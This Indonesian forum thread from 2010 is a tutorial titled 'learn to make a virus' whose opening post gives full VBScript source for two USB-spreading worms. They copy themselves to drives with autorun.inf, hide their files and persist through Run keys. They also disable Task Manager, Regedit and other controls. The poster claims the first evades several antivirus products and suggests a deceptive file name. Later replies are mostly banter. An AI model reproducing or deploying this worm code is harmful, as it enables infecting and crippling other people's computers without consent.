<<== Silahkan Daftarkan Diri Anda Terlebih Dahulu ==>



 
IndeksIndeks  Community StudyCommunity Study  FAQFAQ  PendaftaranPendaftaran  LoginLogin  

Share | 
 

 Yang Mau belajar membuat virus masuk......

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
ando
Anak-anak
Anak-anak


Jumlah posting : 55
Join date : 05.12.10
Lokasi : Dalam Kandungan

PostSubyek: Yang Mau belajar membuat virus masuk......   Sat Dec 25, 2010 2:32 pm

saya cuman berbagi saja kepada teman-teman, mungkin teman-teman sudah tidak asing lagi kan dengan namanya virus komputer, ada banyak jenis virus, sory kalau tidak bisa saya sebutkan satu per satu.. hehehhee
teman-teman pernah berfikiran tidak untuk cara membuatnya bagai mana..?
sebenarnya buat virus itu gampang kok, tapi ingat cuman sekedar ingin tau saja tidak apa-apa... :smile:

kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. ketikan code berikut ini pada notpad teman-teman, ingat jangan di copy biar lanjar bahasa scripnya, sebenarnya ini basa VB...

Code:

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay, saat kompi saya kenak virus dia... meniru tidak masalah asalkan jang sama persis.. :smile:
Tapi yang ini mudah-mudahan lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa......

dan yang ini teman-teman harus dengan VB untuk membuatnya...
virus ini saya beri nama "hantu" hehee,..

Code:
El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\hantu.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\hantu.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\hantu.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\hantu.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\hantu.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\hantu.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\hantu.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2008
WScript.sleep 20000

msgbox “selamat datang di virus camp_luck” & vbcrlf & _
“maaf saya cuman menggangu sebentar” & vbcrlf & _
“sory kalau komputer anda saya kuasai sedikit” & vbcrlf & _
loop


semoga teman-teman tidak di pergunakan dengan jalan yang tidak benar, ini agar teman-teman tau saja, bagai mana cara membuat virus itu, biar tidak penasaran cara pembuatannya.....








Terakhir diubah oleh ando tanggal Sat Dec 25, 2010 3:19 pm, total 1 kali diubah
Kembali Ke Atas Go down
shoonen
Co-Admin
Co-Admin


Jumlah posting : 263
Join date : 06.12.10
Age : 24
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Sat Dec 25, 2010 3:10 pm

ntar senjata makan tuan g..!!
Kembali Ke Atas Go down
http://coding.indonesianforum.net
ando
Anak-anak
Anak-anak


Jumlah posting : 55
Join date : 05.12.10
Lokasi : Dalam Kandungan

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Sat Dec 25, 2010 3:23 pm

shoonen wrote:
ntar senjata makan tuan g..!!


atas kerusakan pada komputer anda bukan tanggung jawab programer.....

:ketawa: :ketawa:
Kembali Ke Atas Go down
Hendri Pebriyan
Moderator
Moderator


Jumlah posting : 104
Join date : 13.12.10

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Sat Dec 25, 2010 4:29 pm

hm....
blm dicoba..
tp gag yakin ane jalan anti virus ntuh..

kemaren ane juga beli buku di G******A,,
bukunya ntuh di ajar dan mengupas abis cara pembuatan virus melalui run atopun notepad atopun progmnya..
satupun tag da yg berhasil..
eror terus..
ternyata gag semua buku itu benar..!!
rugi deh akhirnya..
mudah2an aja ini gag,,

emang yang buat udah coba belum ??
hmmmmmmm

_________________
:smile:
Kembali Ke Atas Go down
Admin
admin
admin


Jumlah posting : 183
Join date : 05.12.10
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Sat Dec 25, 2010 4:40 pm

memang kalau untuk membuat sebuah virus menggunakan program VB (Visual Basic)...
soalnya semua virus di analisa scripnya memakai scrip VB.....
Kembali Ke Atas Go down
http://planetfasilkom.hisforum.com
Hendri Pebriyan
Moderator
Moderator


Jumlah posting : 104
Join date : 13.12.10

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Sat Dec 25, 2010 7:39 pm

betul tu min..

_________________
:smile:
Kembali Ke Atas Go down
syams
remaja
remaja


Jumlah posting : 98
Join date : 08.12.10
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 10:05 am

Hendri Pebriyan wrote:

Spoiler:
 


Mod, tapi ente dah pake linux ngapa harus takut ma virus.........:apaya: :apaya:
he...he..he.....

:hihi: :hihi: :hihi: :hihi:



Kembali Ke Atas Go down
http://syamsmoobillex.blogspot.com
ando
Anak-anak
Anak-anak


Jumlah posting : 55
Join date : 05.12.10
Lokasi : Dalam Kandungan

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 10:09 am

syams wrote:


Mod, tapi ente dah pake linux ngapa harus takut ma virus.........:apaya: :apaya:
he...he..he.....

:hihi: :hihi: :hihi: :hihi:


berkreasikan bukannya pakai windod aje...
pakai linux jg boleh.... :rokok:
Kembali Ke Atas Go down
shoonen
Co-Admin
Co-Admin


Jumlah posting : 263
Join date : 06.12.10
Age : 24
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 10:28 am

ando wrote:


atas kerusakan pada komputer anda bukan tanggung jawab programer.....


klu gtu ane g jadi nyoba deh..!!
Kembali Ke Atas Go down
http://coding.indonesianforum.net
Hendri Pebriyan
Moderator
Moderator


Jumlah posting : 104
Join date : 13.12.10

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 3:01 pm

hai sodara syams..
anda tidak suka dengan saya rupanya..!!

_________________
:smile:
Kembali Ke Atas Go down
ando
Anak-anak
Anak-anak


Jumlah posting : 55
Join date : 05.12.10
Lokasi : Dalam Kandungan

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 3:46 pm

Hendri Pebriyan wrote:
hai sodara syams..
anda tidak suka dengan saya rupanya..!!


:janganbikinmar :janganbikinmar
apa-apa an ne, cemana ne mod..

:rokok: :rokok:
Kembali Ke Atas Go down
Hendri Pebriyan
Moderator
Moderator


Jumlah posting : 104
Join date : 13.12.10

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 5:44 pm


it's ok.. no prob.

_________________
:smile:
Kembali Ke Atas Go down
shoonen
Co-Admin
Co-Admin


Jumlah posting : 263
Join date : 06.12.10
Age : 24
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Dec 27, 2010 5:49 pm

Hendri Pebriyan wrote:
hai sodara syams..
anda tidak suka dengan saya rupanya..!!

dasar :maho: ente
Kembali Ke Atas Go down
http://coding.indonesianforum.net
Hendri Pebriyan
Moderator
Moderator


Jumlah posting : 104
Join date : 13.12.10

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Tue Dec 28, 2010 5:43 pm

shoonen wrote:
Hendri Pebriyan wrote:
hai sodara syams..
anda tidak suka dengan saya rupanya..!!

dasar ente


gag suka juga ente sodara shoonen??

_________________
:smile:
Kembali Ke Atas Go down
shoonen
Co-Admin
Co-Admin


Jumlah posting : 263
Join date : 06.12.10
Age : 24
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Tue Dec 28, 2010 9:25 pm

Hendri Pebriyan wrote:


gag suka juga ente sodara shoonen??

dasar lu gan..
Kembali Ke Atas Go down
http://coding.indonesianforum.net
riyanpinguin
Moderator
Moderator


Jumlah posting : 188
Join date : 06.12.10
Age : 26
Lokasi : Pekanbaru

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Wed Dec 29, 2010 12:05 pm

Hendri Pebriyan wrote:
hm....
blm dicoba..
tp gag yakin ane jalan anti virus ntuh..

kemaren ane juga beli buku di G******A,,
bukunya ntuh di ajar dan mengupas abis cara pembuatan virus melalui run atopun notepad atopun progmnya..
satupun tag da yg berhasil..
eror terus..
ternyata gag semua buku itu benar..!!
rugi deh akhirnya..
mudah2an aja ini gag,,

emang yang buat udah coba belum ??
hmmmmmmm


jangan nyalahin bukunya gan, sapa tahu skrip yg ditulis ente salah...
jangan2 ente yang salah gan...

:ketawa: :ketawa:
Kembali Ke Atas Go down
http://mahasiswa.umri.ac.id/~azwar/
FADLI
baru netas
baru netas


Jumlah posting : 1
Join date : 10.03.14

PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Mon Mar 10, 2014 10:37 am

gan ada yang tau gk link download vb terbaru full version
trim :-
Kembali Ke Atas Go down
Sponsored content




PostSubyek: Re: Yang Mau belajar membuat virus masuk......   Today at 3:55 pm

Kembali Ke Atas Go down
 
Yang Mau belajar membuat virus masuk......
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» WTB macem", yang punya barang istimewa "MASUK SAJA"
» Hal-Hal yang dapat membuat kaum lelaki menangis
» Funky KOpral, ada yang tahu ?? c'mon masuk
» WTA : ada ga yang udah pake knalpot Stereo?
» 10 Virus Paling Berbahaya Bagi Tubuh Kita

Permissions in this forum:Anda tidak dapat menjawab topik
 :: Komputer :: Programing-
Navigasi: